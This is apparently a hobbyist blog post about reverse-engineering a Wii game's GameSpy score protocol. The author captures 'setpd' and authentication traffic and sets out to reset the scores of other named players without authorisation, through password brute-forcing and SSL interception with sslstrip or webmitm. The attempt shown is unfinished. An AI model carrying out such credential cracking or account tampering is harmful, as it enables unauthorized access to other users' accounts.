Rage Quitting(RQ) is the act of interrupting your internet connection to avoid losing points at the end of a match you didn’t win. Specifically, this prevents the “setpd” command from being sent to GameSpy to subtract from your score. There are some very infamous RQers that deserve to have their points erased.

My goal is to change their points to something that lets them know they’ve been reset purposely.

\setpd\\pid\249190728\ptype\3\dindex\kv\1\lid\length\217\data\\record\
KdEh8LCzyfXX3avwYGI7Hsm_q4P+45FRFONgDJp3phZ2X4czTlsu4cc07Q95Cv3zXHz63
XJHuay10auZK0UXcPlvY+_81gIe4sSG_04aZm4rMeVRdbbo31UszxtcBrV9AJxsd+diGv 
cjLy5qM71TpSaIyxLxJghrXp2+dLkucWWH3IaK0ZJFu3n_Ouve5UmyiD88PU6LNMagkD
Aq\final\

The above setpd command sets the BattlePoints to 200, for the ProfileID 249190728.

A player called “THE BEST” is a habitual RQer when I fight him and his ProfileID is 264646755. I know his ProfileID because I can read LeaderBoard’s data. At first I hoped it would be as simple as using the same command above, but replacing my ProfileID with his. This resulted in a “Not Authorized” error message. From closer observation of the network traffic, it turns out that there’s a reason I got that message:

Server: \lc\1\challenge\LWCSCQRQPX\id\1\final\

Wii: \auth\\gamename\tatvscapwii\response\922bf66e07507810b3b7584fb07336b5\port\id\1\final\

Server: \lc\2\sesskey\827445045\proof\id\1\final\

Wii: \authp\\authtoken\NDS4O9DnVeYc3SovbdoE6tcBVD8W7ZF52ZCjuWcYcv/sAcj
+b3Liu4tHAW0RSwZKd9cOqZ7MNc7UrV6fC4j69IFjZA+FtZxhCP5mvydwkXYQ8fpnJX
kCtKqTwDPicMFm7u2\resp\6d6fed1a4c8325f7085f83c9c2e1f17d\lid\final\

Server: \pauthr\249190728\lid\final\

Wii: [setpd command here]

Based on that server reply, I’m sure that I must supply the correct authp command before I’m given permission to edit data on a particular ProfileID. Luigi.A’s work here revealed to me the algorithm for the first “auth” command; as well as the resp hash of the “authp” command. But, he does not know where the authtoken comes from. At this point, the PokemonGTS folks have helped me again. In a much earlier blog post I mentioned seeing SSL connection to naswii.nintendowifi.net. As it turns out, someone edited the pokemon game’s memory, making it use plain HTTP traffic instead of SSL. The UserID & Password the game uses is there in base64, easily decoded. And the server response, is that authtoken string. Because no player in Tatsunoko-vs-Capcom chose their own password, there is a chance that I can guess it. The password in the decrypted traffic they had turned out to be simply “571″. Not a strong password at all, but Nintendo probably figured that any hacker that gets pass the SSL to see the plaintxt to begin with, is the more serious problem. Luigi’s documentation explained that the password, as well as the sesskey, are used in the generation of the resp-hash in the authp command and gives the f(x) implementation for it. I’ve run through numbers 0 to 999999999, comparing the resulting md5sum to the precaptured traffic of the Wii’s successful login. If Luigi is correct(as he has been with everything else thus far), I am now sure the password is not a plain decimal number between 0 and 9 digits in length.

So, what I need now is to figure out how to see TATVSCAP’s ssl traffic. I’m currently trying to apply the linux tool “sslstrip” to force the Wii out of SSL. I’ve also tried my favorite “webmitm” linux tool, which has assisted me a couple of times in the pass to see the plaintxt of an otherwise secure SSL session. If I get this to work, then I’ll see my own password. If it turns out to be a simple number, I have a better chance of brute forcing other people’s password. There’s even the very remote chance that Nintendo has all the users on the same password - since, afterall, they probably think an SSL connection is secure enough.

Looking through TvC’s game memory, the string “passwd” is suspiciously missing. The User-Agent used is “RVL SDK/1.0″. This is important, as I have found that without giving the correct User-Agent, the server will HTTP 302 the client to www.nintendo.com.

I don’t want to mod my Wii, but one way I could definitely do this is to simply edit the ISO of the game to not use SSL, burn the CD and run the bootleg of the game on the Wii allowing me to see the traffic in plaintxt. That’s how the Pokemon people did it and viewed the plaintxt traffic that was suppose to be in SSL.

Well, that’s it for now. Still thinking of what I can do here. ^_^;